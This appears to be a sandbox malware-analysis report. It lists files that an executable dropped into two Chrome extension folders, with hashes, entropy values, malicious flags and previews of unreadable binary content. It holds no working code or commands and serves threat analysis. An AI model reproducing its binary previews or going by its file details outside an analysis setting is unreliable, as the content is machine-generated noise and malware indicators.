                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):18619
                                                                                                                                                                                                    Entropy (8bit):7.988336443536566
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:faBO42XQrgVH2bJYbWwrcoVYEDhb9ifq2jI+lRZJ8nxqeUMKHNZQd:fbpVWmbWgnV5XGI+l5FHNZQd
                                                                                                                                                                                                    MD5:181D4CB040A7DBC40F265D094A8D087F
                                                                                                                                                                                                    SHA1:E93E314A68853C10EA406FEFF973ABD56A504D8F
                                                                                                                                                                                                    SHA-256:2E8DA36196A5EDACF0E9654AB813BA8F7FF73EB836405004C49868B63B648486
                                                                                                                                                                                                    SHA-512:9238A194B56DFF283A3E2FD02FB290D47B93810E391F433C4B50A8C9A877113A8F80B3DA722D62D8CEF46687F9BDDE84BC1DE758E4AFD52E70BBF4BB63929371
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .a.....b...&..$.X..x....q.....W+$....LX....*..e.A%..#..v.......F>b.pI_..W."......X...G...,.|.Q.j......,[.>V.O......{e)..M+....+..0cE...p^..Ff..Z....gO.%.b.S.!......ef...C..e..f.q......G.s..4.T..b...;... G..>.e"..Y..(.=..7.2..H.V.B.^..B..E.-.3f..S..!..kW.X..?3,@...7.C....P..vHs...?S.x....f.......+....?......s}.B..ZT..k..^..X...<..e(M..Y..\..G..r...l..xp.~.~.v.xy.Qr.{......*..xb.h...5.W.<J..Vm}.I..Zw.....%@e.S.+.yV..t.#.C...P.....;.."...$N|r......1.w...3L...Ep........;.+@..*..#r..o.^.y.i.S.....p..yC......].&.8.2.....}...F.)..`...Z......t.rN.................^...!%.MF...7..y......9......u7......hS.9_:...4.._...e.......<.@...h.S..#)...NjbU"$.m.......U..}..1./.".l...y^.sV.D..`.Cyfb......h.+.....z.T....,7N"G..x.s?.Ix..,..}..M(..m......W...m\./(F-V.d.+.4........W..W.].#>^..tw.(.}.;.._.?D.vR...H.d.....Cw|.|..R.zI.MA}... +*.I...c|~n".g.}..(....Gz.#."x.K.....o:..~}..P..W..a..1.g..P@....^O.1h.~.;...G.V....e...{C..._.w.._...4/..P.....46|?....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\dasherSettingSchema.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1183
                                                                                                                                                                                                    Entropy (8bit):7.813597328985027
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:e/nElmlqS5cfCBDxteoQCr9Pz7TUq7BTvWB5MOo/AiDYKkbD:ef0xSESL9P398BOFoBKuD
                                                                                                                                                                                                    MD5:C562DA49AC79613995677F16DC12141A
                                                                                                                                                                                                    SHA1:46A0E9C3DCF23D92F0CFC541210D946B56BF9E12
                                                                                                                                                                                                    SHA-256:CB05987B3D37DC61FBDD7AF71BB57623C7005E0C6F253C31F86F715A67FFB976
                                                                                                                                                                                                    SHA-512:CFAF9E110873A7FB31855B53D30DEC13A1A1C7ACCE89B10472923E0626305356D33473D5BC52CEBA8B2A5CE0FC5D5F0F7A614D18BB8B29FCB3EE30263FFA2824
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...n...XHt,.I..........o......\...T....O.yN.6.h......b`._C.p..k...y...7.....M.....d........J z_....+.&...Py...X......m... .t.$"..wI.P.....\..;.........`*.^IGqJ.......("(.J..F..Og...*..}.9........N...2.?.[W..l.X...2u~~...Tf..4.sJ.B.&..#..g..o...8.x.....U....g...p.J.Z......kX>%..&........=C..`a.....&...f.....j.M.#Z.....q!H....x....4.l.Q).`\.j.........I''Oz.4v.W....".|M...K....>..4r....OT...i.v..R<../....t.?bZB._t!o...UA..~.....t..^..FP...;........,8...V_. ..#,7...x.\.M`mp0s.\f4...=.+.*X.U$...p7TM.:....0.}.o.].Q.*J$.\.kP.....Q.T.7>.;K..9,1..s..u..PN.=D.s..@.P......C|OSu...lv.d3...OXTJ..v.\k+.....N..:i.B..p.`o..HL.r..x...q..Y.;..T.".\IL......Ca..5FS.f..v..V..3..Y..C70).,$%..e.N..X&.4o.Q.B.....!^.L...U..?.P.,D..Y.c..M..E..O.B.BLxa+"`.u."n....+/B..~....5..@.a.sE..^.)M/}.+.4.2.2j\....(.m..>.;.y3...~.....J...q..x.......i7.<...]......5.R.....io..y=X..z..C.....A|V.(*.. ..]3....Z..K.A.v.M..3..|*.v......4.Z.....R.+-.M.|.FQ...@.A-.5Bvj...].... .i.=Q.....x
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\eventpage_bin_prod.js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):68128
                                                                                                                                                                                                    Entropy (8bit):7.997044156315088
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:A1zQooTDjAbu9hW8yKqHwmRxQo9X5K1cEXitWS7tPIudQfW7p:g0o2iMsXymt9X8FCtQ30p
                                                                                                                                                                                                    MD5:A93FF83DAF0097994ABE43CB80851296
                                                                                                                                                                                                    SHA1:A6153E293CEBE4FC29DC055C060F8D1569815213
                                                                                                                                                                                                    SHA-256:5D10B62DECDEBDBFBB81B7A65858921A69D5D49854D57D6E3ADC6CF3A279A968
                                                                                                                                                                                                    SHA-512:047825EA52960412F16D37B9673DA166EE8E79C6A79BE50F3A4FC685DAE15A608B3700302532DB5512A5496C19E3BD82B4023A5D06E67FE5E199B448A7EC9742
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....:.t..'..U.S.....3..._...3c....n<..9.........%:.~.!.a/4..~c5CT.g.....E.!..".++~c.. .Oh.Cjg.a...Nz.A...8g...&R...4zZ.bm/..7.87.....y.._F..<1._.z....I.w.9...K#.O.........C...za..}.....yu....w.Q..K:.....AA.f9.ha..}..N.C...lh..0y.yLc.y4..8..(f.vM.N.:./.....y.....3.c.".....i.X...Xf.9...3.m..-.\..O.QZ..b.x..Ax..*....X....)..v.a!T...3;.I'ec......n:i.u......Te.$..M.3.......^%..=..P.......Y..]....uD..s....p....e.p..d...Q.0wav3X....N..4...."./......S..........nI$"...).O.3^..T.2.CG..(..x...y.]...*.`Us`=.}.8Frfd5'-.KG+`.B.:.r....k..L.~....?.3..25e....8...&....+....(.v...9.`3......%...0..B:*....!.c.Tr.........P.4z.....m.i...P......kH...tG..mWy..%........0.+..S....d.}V.8.K(...B...3k.K..i7.)B.....7.QH.~..o;E.r..B...J...N...Om&.5.Y....j...:G...?....*r<.~...u<B..l......6..?..<../..E.......Z..*..!.B!Dk\H9.....~.....IJ..~...J5dg.....{(.....RU....].}$.f.r\.g.]?|8n7...qd...>=9.K...]...4"aK.J.d.P&...E.C..d....Ir...I..iE3.X.....o....:.P...Y=k.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\manifest.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1849
                                                                                                                                                                                                    Entropy (8bit):7.895117760308051
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:8P0QOL3+7x9E5PNMkGZ/GL32v5cntayHRXGciXVkHo/28ceHg6Pp0EWhBpbD:8BOLIENMzctHVYVkuzjR0EkBJD
                                                                                                                                                                                                    MD5:AA9AD064C7CFA6F9285FCDA0FFC65A46
                                                                                                                                                                                                    SHA1:7B33117DFC77CE87B2F64BB24ABB05AFE8248893
                                                                                                                                                                                                    SHA-256:718D191C141EEA1440A82EF7446149B1A143D43584499B95C803BDDDF1CF17E7
                                                                                                                                                                                                    SHA-512:D53EAA46851C7E916F23D5576D125D254C6C83B2C4CBA742B6DAD5670A064DCEDB6A2C6A47010510B34ADBF0145C7B43037FFFB526A30D8322270266E33BB65D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: -d>(.'..E..d....V....d..d......o..7.............!.X.t........E2.W..'..P....r..Hj...J.6..X.y..M...y.....e...z.(.a2p..r$vz....I.{.}..>w{......"...6d.3..;>.R.0.....x..2t...7.r.......".....'L....Q,.....g..t......GFZ...[9.wFA...#8k.T*..0..y.....m...P.v.Kn.^......M:.b'...Dd5.-.u.-C......e.._..9#c...;....|.... ....,B.A.1..D(h9i..6....v@((<D..cN.w2.Zh..T.....V....Mw...4.>..C..ZE..JY*..?...{<yv$.WG..cn.5...a.M..!,@]Z.#..a.Sr..4.B......]..3...~.0....j.Hy/X@#t$sg...m........lD....O.....OF}o.....<...Mn....Wx........>.....{....1.....5..x.H.Q..~.2.zV..P..........K.o.k..n.|..b.P..~".C.......J.J>.....+[\.3.).$..!:.R......E...[..Ei...B..C...[._.1_...V[.D..yTt.b.zU...Jo_.h.........a*B.I....x.h..z.........N.9z\o.ne:..r.......2M.u.J..c..vnG....s......w..;T..!;y...+%?.....;..}.W.k+.J...j{|..J2....q:+[...,....>..p.......b7d....%@z.}P(.(...I.CbS>... ......aK6.MeD.VHM..<g...L.=^..Y...J..UZ. 1.<.PkK...Z9#r.U..%{.[......;..n<.......C@...1...c..4...l..."..z.<d
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\page_embed_script.js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):576
                                                                                                                                                                                                    Entropy (8bit):7.568818521075749
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:PhtxbaiFjYkUoVPLIS2ChwA2mxnMdeRbE+PqrPk8Lcii9a:JbaojOWJn2fY5v8zbD
                                                                                                                                                                                                    MD5:A9DC145614162848E88D939C4D78FD3E
                                                                                                                                                                                                    SHA1:839E44A277221592DE0EE84BA2575111F50638AB
                                                                                                                                                                                                    SHA-256:543CE6C36342484714C500A3B1A6FB05EC1913549B5AEDC1509F123662C92565
                                                                                                                                                                                                    SHA-512:82817FFAA3F166B55220A2666537E3DD8ABB89CE3036C3175BA71D49BB2192685113B841B4E6EB1F70910521E78A2D8E300E7732ED989DBF55F6BB254B6A9B1F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: [...F.h?.!Q..a^7S..v....v.YO...V...Je...^O.GR.(.B',*...?.....JD....:.I$...."M......f./.....&..;.(.xW..:..6...U.#..61...H"w.|t.=...w;.Z.....).1w-.\..)..D...tA..`..gL..}~.Hu2..jG..c[GT./t.....)..`\...".j....%..1.".8._..6E...$...YL}.iTI1Y...K.g.V*h.:.....O.........].8.r.3...',C.r.m....$l.GN...0.......f.l..70..2b.m.T n....K."k.2...e.5.V..J.zm.2[..aP..a.1j`..1R...........4...K..^...y.\[.{..i...-......q.O..f....j......x(7...0Bd.B.T.."...(.+..5]w....G...<....>.t&U.Gu.|...I.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_metadata\computed_hashes.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):18267
                                                                                                                                                                                                    Entropy (8bit):7.98997064302538
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:xkH2xRRX15o+k+Ots4xvRjSd7aJVLiSSC7Cf4AO:6HMRX15o+kb9jSlOUDCSO
                                                                                                                                                                                                    MD5:4A92FD58D45BE47F1440C68BCFC25B1A
                                                                                                                                                                                                    SHA1:498AF1B4962A4E2AF48C703133CA608572C2F0E1
                                                                                                                                                                                                    SHA-256:D831341360CE47473947B042BA0072C44522CF6507CD23DDCDCB6FA52B12503B
                                                                                                                                                                                                    SHA-512:7305E3453700E597A91A2DE4E4B3F23CAFE28DE735AC8A27D8A6D8AD480DDC3546D0E386711CDE65FE339B0AD51C4AB1C4E90993298F47FBABC0AA451C8C1EE5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: q..d}....8=.]........'.....Q.f...b.. Pt.PGut(..M...=i Y...w.P.$v...<2.8.Y2.y..m...=5.D.....5R.%........i../.a.y..,k#..|N.i...q.8."8 ;...(....mj/w....<zj...E.w...gt}.|Z(......k..N'.$...P.~....=..K?i.RI7Mg..x[.4.x...:..........lY...C.%.U..Y.....]..2..xg..^#..$.....[.z..]...~s.....,*..5zIr.'Tg......h..!A....*.....3.....rI...6.k.....l.B..h4Iu...5................).. ......Xo....g."....{......n4K.E..H..X.'.s...p0f..n..A#.Bx..7..G.N..b.=T...a e.....`...=.n...t.....W.q.n...(.b.......{\.r...c..>.&.C.... tYa..R.|..(^..e.3.@..duA.*HX.([..N}.X.........dc....&TH.r.N.|zH.Z[.K.l.'R8.1.b.H.v...|X.Qg].G..\2......F=yi...U.....Z...fdP9./.WZ.Y..6.Xe.>........h.<...e.E~..K...F".V...7...U......x.i..]M.u..4j......!Cc.y..'.\......&kOa...rN.#%.L,.MW9..Z8'.n.yB?..w..a.r.'.].....dZ...W...\.#Z@~......^..::..).....(y..Z.yf"...M{kNU<.64..J..@..*W_..B......f"...vF....F_~._...Qc`1.......NB.!.........+.f.J9nz......X.<..c,"........|_.e..K..Z.......{........q....9}....5...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_metadata\verified_contents.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8109
                                                                                                                                                                                                    Entropy (8bit):7.9795095667217
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:4hU8+yC2nbdYTzpgOZbReEcnyZua5bD/qzc66l+eADAELqwqYk:4W8+V2bdYT2OfetoZqzc6be9ELqwqt
                                                                                                                                                                                                    MD5:1857CD9CDF2D9091DEC82074512FC2D4
                                                                                                                                                                                                    SHA1:86FCED3A1330671D1F771558F9F120FC60FC1C40
                                                                                                                                                                                                    SHA-256:AEF5944B6C176B1A2F50E7597A51A7D0A69EBE8AD65171AFE85DC89941AAE715
                                                                                                                                                                                                    SHA-512:4152CD4D112BB59BED7C8CB42FD89CF36237DB17913345F0B8F1CB9910F0B09404F9EC61ED488C1CA45BA59752760B9FA4B93B3FDA48C14E1F3822C64D3945B7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..2..+..)......"..I .....SU..m#1B..._.:.;..5...t.}.s2d.(`..zl....A.M.@......C.+).c...X'.n..E.o.v?u(+e..[.l..dw..~d%Os...)...Su..*r`m..v...ci.r.k.|.#j....X.zT...3.E........$9....QRzRZ..u._>7..4....j\........l.,.7........Z.........._.>.U.[...7.?X<x....a..!.U.Y$...IH=n.0..FOw.......J>.KBf.....a...[....I6..4.#j.[..G...@v...c..f.w..g...>>...<....3+*`.,..K.....o.8..q.v...k...L.h.....C.ya!_gI.UM......6'[tS/.j.:..>.@e.T(Z....@N/.D{#.9yq.U..."............S;.%n.P....&P.W...67;#...........,.>.......-.F....TW.V.......>.L..?.*.?....P.A..U..z.<.G....z...g......w..I.sx=...t..+Z..cT.j..m..W.J...J...[..._.y1%.rn...P...hK..E.6....%(...?... =[.{.....L...f........2"..U.~J.'5!...yL.%*t.c..sX.Bb.....J..w..{..... .nJ..."..Y..-..G!....OE.....1L.....8.$...m.u.`..L......U........k.>>Z}&../YwI....G...t-.K.{.|.J{?.;:?......9)7.........+...y...|5.<..~k.x..[\i....b...k........*.....[..5p.g..D....1.(.U.^..|...T...g.nb....P.,..#d........4..Jq.]-.5..A.5.j...CI...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\craw_background.js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.999039685294896
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:8P/Uj9HJCH5sQLwjoGnwkpPtQVVv/wK+K8ecn1Y9WgddA9p8b1kZqbb:8ny9HkbLwkGHqJ/wK+K8E9xME1xf
                                                                                                                                                                                                    MD5:BB15B12858592AFDD567454AC3885199
                                                                                                                                                                                                    SHA1:37A7D81F59B22E5BC6CAE22747C86863F5A85AA9
                                                                                                                                                                                                    SHA-256:2DB2D23C12E3E766566A5CA1AF4C8F1F06A3399EAC2616425A71F6FBB11F74EE
                                                                                                                                                                                                    SHA-512:1A1E08F58214DD059459DE5F35ED4E9663299DFFA92355D3CFD3A9A315954B8E4FBCF034DA7E64466EFAE8ECB3B38E3664C944A952D198B209ECA67816194E0F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ^>......I=U......5=K..ZM_....'.D{....m,....g..j#b..w.k+.#.m3.7|i......E>t..~.tA.....%.%.`R.........l..1..e.>....~...ZW}. .bLIvN.|....."..8.......L.Q...S.Uzz..[.Z.(.-5\A.....W~..w....z1..j..J0W...Z...].......@.HDn-5Csr'.j.bS..E.R...S..L...!.s.8.....jRT^.r&.+...W..K.7.q.TX.S'..`3...].\.Q..y.w.=\c.7.H..L...!..".]Bs......)...o.....d.....C..N9..\....S..-._..jVN..W....*@.t.9=...m......AKH.........O..EU..MC..H.nu..4.}J#.......d.%^..R......I..N..].}.=..b-...k`..;.*6{....d..bi+8..V...gd...0.~...x&.v.x@.......{..aD....*\.".....7.....`...v.d....x..I.U.G...\....d.BG.:.|.{.........nL.....w..m...Y...&....n\.......lj...o..X.N....3....5Xh_$M.VQ..2.....Z...*................S.;}.Z.]..}\.:.jo.}b6.......{1.F.r..G.~~j..5.~..))......!.....V.I.e....6..^../.N5.^.M..y.V....-.......s..|m3.....&...4.......=.n....#..s..f..}.$Z...l.WxN.1.O.....VO.........5V0...1..6.&..w.{.8v^.r6.Z.G.......d..8.#....\z..................U...M.....{.M?.@....2.$.>....{.d.t^...........:g...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\craw_window.js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998823892972147
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:So/8YsGoN1E+XJ8YulcFWr64HaOlCEzl7F/eHeiph/YEZy9:LF4VAlcFSrHJsE5Yeipm
                                                                                                                                                                                                    MD5:583284AAE913CA838D8C360B64D6EE8F
                                                                                                                                                                                                    SHA1:D5C7EF3833C448F686341B5594C4AC00C8A07907
                                                                                                                                                                                                    SHA-256:F593C5BE3897F688D8FE27F0CC2F95BDA7BA65D24F3A4F1402A48639E4669F48
                                                                                                                                                                                                    SHA-512:6F38671C5679712453F4AB52AAEC83BA0AE7D3413AAD4BB026F7AE461BB03660C501C870F6B5790F8B7002B7ECBC64A17A71EAB18F6ADF722BCDD58E5DB5B46D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .......W.....uv..v..:._z.. .........oX...|%-.M.Z..a8..N.M0a............c.......P...J..e..ht..ZC...=Pz00....R/...X....%.y.uY.2iD..lU..'.9.x..Wc.i3_.W......fu+..A.jh..]%G..bnS..3ur0OI.U.G.(.1..D.....N..oMB.R...w. a.....K.+....N..uM......h..t..?.p.v.pD3..^...J.2...T9.P..`.5..O...8...{....}.....)3........g...c..o>..._..o......T..y....<.2..J..h......Tp..y..?qk......O......D.../.4n....BR.............*Z.....@i...f"4....5:...w....pdA.H.Dg...@UY.4.^..La."......^.&...\..TQ..y.....z.. [r..RF"C..f...3...UN]..J-F.5N...~t..)...;.N..i.....8....6;.%..'.x.q...cW....U.N....N.e..d.!........G.r.@.....BO(v4.e..u..K...>..h.F.xx..3....E.1.......2~e..X.........3..{.m..1...,[......<v.a.I.Qs#..Z..J..bQ....\X..@..3m.c...Yj.H...$...N...v......H.6.QP.......C. ................KGO.9.n..M.j./r&$.{...`..M.Em..(...{t={...*......b...O.CK...V...o..l.G".......8...N..5....~..P.R.........P.,..a.~....M.J..........j.p;@v.B7g...-._.uV.h......[....Q...VQ..P2.WVP.......~K&.l..%.O+
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\craw_window.css
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2070
                                                                                                                                                                                                    Entropy (8bit):7.893797417657196
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:CLRCfeBf33GKLCdR4VY66ki5RaUhDJ/ihKA30wKYCV//cyED:qRCfgf33GKLCdxkiZFJiL0wK//cL
                                                                                                                                                                                                    MD5:F9DF59165E89886520DFE10A0613D5D5
                                                                                                                                                                                                    SHA1:2D5E55F53E5C85980A4FBD5DD9FC062362C9B04B
                                                                                                                                                                                                    SHA-256:456767740F4EEE211D452D9E18CBDE852C6BA097CF17AC23B1B9F37E3C63E6DC
                                                                                                                                                                                                    SHA-512:7C833DDFED5DE0298C7A14E823124A0F36E2E9CCD101477EE9FDC9EA46420962850A115C7B6AF37706690FB5E8B24C4A583D9AFE8486614370DC4F829CF291A6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: `....7..~...{...$&r.H}.T.......)X......f..nBN.i.Zh.....!.B.a..Za...z..9r. .". .Y6.:u+#X..1...;......u.!...F<.{,..(R....].*....W.... l.k.{...4..<..r4A`qV.i..xY.|.~.E.@~..S..%5R..+v$..%.v.#..v.A...Z.:.f#{&l...e...x+..'Zl.X....'..p5.^..0...........|.H._....#.."Y...i>..2I[).0.......$.7...).e..O1"[C.8..u.#...]...v...k~..8.Fp.A|..l.p...W..>.8..au.d.8W....G...X.[Q..P..5..T.O..U.......8...M(...HcVN.y!...Z.B....[.(Ik.9.\...!S.....P...^...qn..`..s..YB[?LSf.....f...q.Y..Ty...f.(.....D....'...,..{.;.97u..y..t2wB....nW~h.....+..BCI.n6...V......c..D..y.{.~.........4...6....g.../..j..Eg.9(..C...m..8.......V}.).<..T..2e.~.H.v....0.`B.Z.RS.~@h].fh.......!....I../.l..%]...8.~.........}....%.... .y...s.....{*Sb.E..2#gogSk}(_7..A{. ...w...._..p.C..........N.Oo\#&.M....4.NB.o....4V..]suM.}......T.<.x....<.O.WV..6..,.q.Nwk...Z`;.co......Ib..`@.5..G.ew[j.<.8D...`.........s....R..$k.V.(..:..M....7y...L...i}n_.s...K.D.......t.p......jt.>.>..{}....>:.9.;z.&...9 @6.t..<c.#(
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\craw_window.html
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1139
                                                                                                                                                                                                    Entropy (8bit):7.826854860224673
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:61mIzo74HXexp2ChVn7FwOOBXY71dAC2ULAe42IVs8Ka+Abj/YkF0bD:omIagex7D7FtOBoZLAe42ksVy//eD
                                                                                                                                                                                                    MD5:FCBC177C7A926E0F9596BCEA0487317A
                                                                                                                                                                                                    SHA1:0F21B644810C872161ECFCCFA8F4C813C8CE0445
                                                                                                                                                                                                    SHA-256:89CAAE1526E5D32CE66962A90B04128ECDE4776BF4A24EE08AFC74B1C06DD362
                                                                                                                                                                                                    SHA-512:5155F2862619C76894776B4DE9ED6ACCCC3AA80E95F626FE7EEE95D9834F684586A09289A1C0D201367535CF9A0F9AEC3F07F2041ADEFF902ABE9796A9930C2D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .St...i.X....X@@..@....#...M..?Q......ZI.f.B%......&..%....B..q.(......#D..hA>....9..0....V;2.~....!..4]..v.........|.6.......R.a6<..{.Ru.4.wa....r....P@=.a...}...o..pb..!.Qj..*...>5..rYS.....$..D.fv.. . .y...L..C..T.'.....$..>...mY;..$#./. .d..Z......hT..@G].....*;q..`;.Oi.....Ht-%.....c.r...\.N...y..5.Sf.....{....<8|.pB.|M....HY..M..f.=P$.....=I#....G..%Q.:h%7...7.`H.....v.2,h..)..Bl.P/S.5.QDA..C.u....5W.U.m...G..=...2Q.!...n]......0.9<......9.!...s.2[...$..5$......Zz.r...Y..`.<..x....e...Y..B..U..K.s....S..@.........%.7'......M........z..ms...vy../.....x.b:.....gP.....i6Xv.t..g../...W....Y...&X.6S..B".....g..?./B.y.h[....-..`....$.s....'..b.f..".y.."......}.........A.2m..m......|..Yb..9.k..moA....n/.N.B.L.]....c..6Rp..@.)|&I..A-...Q|.P.d...p.@........A3.."Y.o........)+...a.....p.#<S.[.._...Q.1f..F;.#...:.~.OM.W..X:.].~J!.|.3....)..s..u.m.7I:.L.-...ep=\Q...t.O..e.6..t#.;....M.e.k....*;.....-.=.K. .-..@.....pj....IE..w.8.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):70693
                                                                                                                                                                                                    Entropy (8bit):7.997709538539508
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:+pl3e4T+E6hGy5fylWMn1/aRxOuqhP4TpbRCzkesQUqhR5y3Bq:+je4V25flC/aR+14jCzeahmBq
                                                                                                                                                                                                    MD5:AA219BFA21E6F898246979FEC788AFE1
                                                                                                                                                                                                    SHA1:41A5F53C2A923B66C7222A244F297A2757D15273
                                                                                                                                                                                                    SHA-256:1F595991E434057ABD31526B5408D9606177C3AD5046DE3C61CD68A06E4B94FC
                                                                                                                                                                                                    SHA-512:B09E767E1B6C2337E7393DABD7DF343A2B7ED5FE017253262C33D4CE513DBA5444E1E77F6B35B57BF42BC9A7CA2C0E7FB8C6ECBCA8C2F61B2CB2A812414A23FA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
